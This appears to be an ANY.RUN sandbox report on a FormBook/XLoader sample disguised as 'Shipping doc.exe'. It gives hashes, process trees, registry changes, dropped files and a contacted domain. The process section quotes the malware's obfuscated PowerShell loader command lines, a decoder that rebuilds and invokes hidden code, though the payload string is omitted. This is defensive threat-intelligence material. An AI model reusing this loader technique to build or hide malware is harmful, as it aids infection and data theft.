File name: Shipping doc.exe

Full analysis: https://app.any.run/tasks/5afa0e4d-f7b3-40e3-bc04-24ce8d314c2c
Verdict: Malicious activity
Threats:

FormBook is a data stealer distributed as malware-as-a-service (MaaS). It differs from many competing malware families in its extreme ease of use, which allows even inexperienced threat actors to operate it.

Analysis date: December 06, 2023, 14:14:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags: formbook, xloader
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5: C7CED9666598285A885FD798BD9B5727
SHA1: BA045289BA06F9A078C8AD705858D0C098A19028
SHA256: 4B515E730EA1CA9505DAD8EC279AE295B945DC93308248DF2315763B15FEE19D
SSDEEP: 24576:1J8dUmsYqNMJFwCuegu2OeepjLUR1VkWCedt:1J8qmsYqNMJFwCuegu2OeepjLURNCOt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • FORMBOOK has been detected (YARA)

      • verclsid.exe (PID: 2936)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 996)
      • Shipping doc.exe (PID: 2736)
    • Reads the Internet Settings

      • Shipping doc.exe (PID: 2736)
      • wab.exe (PID: 1652)
    • Base64-obfuscated command line is found

      • powershell.exe (PID: 996)
    • Reads security settings of Internet Explorer

      • wab.exe (PID: 1652)
    • Application launched itself

      • powershell.exe (PID: 996)
    • Reads settings of System Certificates

      • wab.exe (PID: 1652)
    • Checks Windows Trust Settings

      • wab.exe (PID: 1652)
    • Adds/modifies Windows certificates

      • wab.exe (PID: 1652)
  • INFO

    • Reads the computer name

      • Shipping doc.exe (PID: 2736)
      • wab.exe (PID: 1652)
    • Checks supported languages

      • Shipping doc.exe (PID: 2736)
      • wab.exe (PID: 1652)
    • Create files in a temporary directory

      • Shipping doc.exe (PID: 2736)
      • wab.exe (PID: 1652)
    • Checks proxy server information

      • wab.exe (PID: 1652)
    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 996)
    • Reads the machine GUID from the registry

      • wab.exe (PID: 1652)
    • Manual execution by a user

      • verclsid.exe (PID: 2936)
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (67.4)
.dll | Win32 Dynamic Link Library (generic) (14.2)
.exe | Win32 Executable (generic) (9.7)
.exe | Generic Win/DOS Executable (4.3)
.exe | DOS Executable Generic (4.3)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2021:09:25 23:56:47+02:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 26624
InitializedDataSize: 141824
UninitializedDataSize: 2048
EntryPoint: 0x3640
OSVersion: 4
ImageVersion: 6
SubsystemVersion: 4
Subsystem: Windows GUI
Total processes: 37
Monitored processes: 5
Malicious processes: 2
Suspicious processes: 3

Behavior graph

Processes shown (graph image not reproduced): start, shipping doc.exe (no specs), powershell.exe (no specs), powershell.exe (no specs), wab.exe, #FORMBOOK verclsid.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 996
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle minimized $fat32 = Get-Content 'C:\Users\admin\AppData\Local\Temp\undercapitalize\Howes.Mad' ; powershell.Exe "$fat32"
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: Shipping doc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
PID: 1652
CMD: "C:\Program Files (x86)\windows mail\wab.exe"
Path: C:\Program Files (x86)\windows mail\wab.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\syswow64\certmgr.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
PID: 2488
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Parketternes Blasphemously Noedvendighed Nummereringsmetoderne Stengulves #>$Ritraadenes = """[obfuscated string omitted]""";<#Sondrings Guitarfishes Paronymize Instinctivist Modulariseringers Durations #>;;function Observatrstatuserne8 ($Pjkkeriers,$Gowkit) { &$Tetanomotor0 (Observatrstatuserne9 'Sa$LoPSnj SkKnkbaeThrSliSheBirGesFo Na-UnbSuxfaoPurud Vr$quGExoPrw lkLeiVitNo ');};Function Observatrstatuserne9 { param([String]$Signalised); <#Dinking Restriktioner testikels Tvundnes hydrotechnologist Sieving #>; $Zuleika=2+1; For($Cordlike=2; $Cordlike -lt $Signalised.Length-1; $Cordlike+=($Zuleika)){ <#Iodobenzene Flowages Kridthusene Kasuistisk Unn Bvelserne Stripper #>; $Haematid+=$Signalised.Substring($Cordlike, 1)} $Haematid;};;$Tetanomotor0 = Observatrstatuserne9 'SkI SEDeXKv ';$Tetanomotor1= Observatrstatuserne9 $Ritraadenes;&$Tetanomotor0 $Tetanomotor1;<#Omstbning Telebarograph Unamusing Zaki Remitting Insectaria #>;"
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
PID: 2736
CMD: "C:\Users\admin\AppData\Local\Temp\Shipping doc.exe"
Path: C:\Users\admin\AppData\Local\Temp\Shipping doc.exe
Parent process: explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
2
Modules
Images
c:\users\admin\appdata\local\temp\shipping doc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

PID: 2936
Command line: "C:\Windows\SysWOW64\verclsid.exe"
Path: C:\Windows\SysWOW64\verclsid.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Extension CLSID Verification Host
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\verclsid.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

Total events: 2 976
Read events: 2 861
Write events: 109
Delete events: 6

Modification events

(PID) Process: (2736) Shipping doc.exe
Key: HKEY_CURRENT_USER\Software\condensative\fremmedordbogen\dybdepsykologi\spidninger\Overtyped38\unlivableness\hofteholder
Operation: write
Name: udlaansservice
Value: %tlapallan%\catabolically\taabenakke\reformiverens.Bio

(PID) Process: (2736) Shipping doc.exe
Key: HKEY_CURRENT_USER\Software\instills\taenker\nicaraguanske\ceps\Quaff\motet\modelregnskabets
Operation: write
Name: efterml
Value: 943108

(PID) Process: (2736) Shipping doc.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\operation\Uninstall\zulukonge\Sauerkrauten74\nonbaronial\homography\aftensmads\afsejles\rumforskningen
Operation: write
Name: skibshandlers
Value: 1

(PID) Process: (2736) Shipping doc.exe
Key: HKEY_CURRENT_USER\Software\aiken\Fortuneless
Operation: write
Name: Tartans
Value: FFB1402C

(PID) Process: (2736) Shipping doc.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

(PID) Process: (2736) Shipping doc.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1

(PID) Process: (2736) Shipping doc.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1

(PID) Process: (2736) Shipping doc.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 0

(PID) Process: (1652) wab.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation: write
Name: ProxyEnable
Value: 0

(PID) Process: (1652) wab.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation: write
Name: SavedLegacySettings
Value:
46000000C1000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Executable files: 0
Suspicious files: 18
Text files: 3
Unknown types: 0

Dropped files

PID | Process | Filename | Type
2736 | Shipping doc.exe | C:\Users\admin\Soldaterpapirers158.ini | text
MD5:3FD0A4D97E08F76F26290B7C6AE1BB82
SHA256:CD4F7B2ABAFFC2A6A3CA4C14A464846A3987979379823FB5497C6A00F152FFB4
2736 | Shipping doc.exe | C:\Users\admin\AppData\Local\Temp\undercapitalize\Pensle\Udfrelsesrkkeflger\slaaens.blo | binary
MD5:623C6C5E3E42D732C882DC6C9DA4C095
SHA256:5B77C8AB579AB8506FFDFFD1AE15E42876F24A8CED9887A41A1FDFDA985A289E
2736 | Shipping doc.exe | C:\Users\admin\AppData\Local\Temp\undercapitalize\Setternes.Bag | binary
MD5:3AB6AE5383FE050F32AB6D4006AFB3E1
SHA256:84472F4B605C04F219C083CC42035F15717B3A5048332274FA8551E8A7D00138
2736 | Shipping doc.exe | C:\Users\admin\AppData\Local\Temp\undercapitalize\Cogitatively\Succesforfatternes.adv | binary
MD5:6CA3CF41EBF13408B4C3B11362B89BC5
SHA256:73151920E22ECEF5B119D2DFA02C78A39A61E93AEBF0472E536466F0D32626E4
2736 | Shipping doc.exe | C:\Users\admin\AppData\Local\Temp\undercapitalize\Grandkid150\Recompensate\Rejuvenates\gasterotricha.ama | binary
MD5:A97F6DCDAA07B0613671803CE5E8FE3B
SHA256:060750FEE447C67AB844D99FE01AC9E07386FC6A8F138E2B9212EC8DB6DD7D9E
996 | powershell.exe | C:\Users\admin\AppData\Local\Temp\uw1bmnri.1nf.ps1 | binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2736 | Shipping doc.exe | C:\Users\admin\AppData\Local\Temp\undercapitalize\Pensle\Udfrelsesrkkeflger\rathole.asp | binary
MD5:4034A7F29204A4F9364F201D66099DF4
SHA256:2A8DF4DEF88DF7D9E40F820B1AE81511B2579022FD321E0C749632A8E5816CFF
2736 | Shipping doc.exe | C:\Users\admin\AppData\Local\Temp\undercapitalize\Pensle\Udfrelsesrkkeflger\woldsman.sod | binary
MD5:18652DBEC863438F7846937A9CDA29E3
SHA256:333AC8377500082322BA45956C946C4CAB630DDE7E9C968102072B39F95FB20A
996 | powershell.exe | C:\Users\admin\AppData\Local\Temp\2ydcxpjq.25o.psm1 | binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2736 | Shipping doc.exe | C:\Users\admin\AppData\Local\Temp\nsnBE4A.tmp | binary
MD5:9A56209DE5231219D85CD7AEEFCA5359
SHA256:D4320D8F5379452B9FEB69F6920F6200085694ED17583FE3BA8CB2D6EA084D27

HTTP(S) requests: 1
TCP/UDP connections: 6
DNS requests: 2
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
1652 | wab.exe | GET | 200 | 184.24.77.206:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?70423193f7c62463 | unknown | compressed | 65.2 Kb | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
1956 | svchost.exe | 239.255.255.250:1900 | - | - | - | whitelisted
324 | svchost.exe | 224.0.0.252:5355 | - | - | - | unknown
1652 | wab.exe | 147.50.227.33:443 | www.lemartines.ru.com | CS LOXINFO Public Company Limited. | TH | unknown
1652 | wab.exe | 184.24.77.206:80 | ctldl.windowsupdate.com | Akamai International B.V. | DE | unknown

DNS requests

Domain | IP | Reputation
www.lemartines.ru.com | 147.50.227.33 | unknown
ctldl.windowsupdate.com | 184.24.77.206, 184.24.77.194, 184.24.77.202 | whitelisted

Threats

No threats detected
No debug info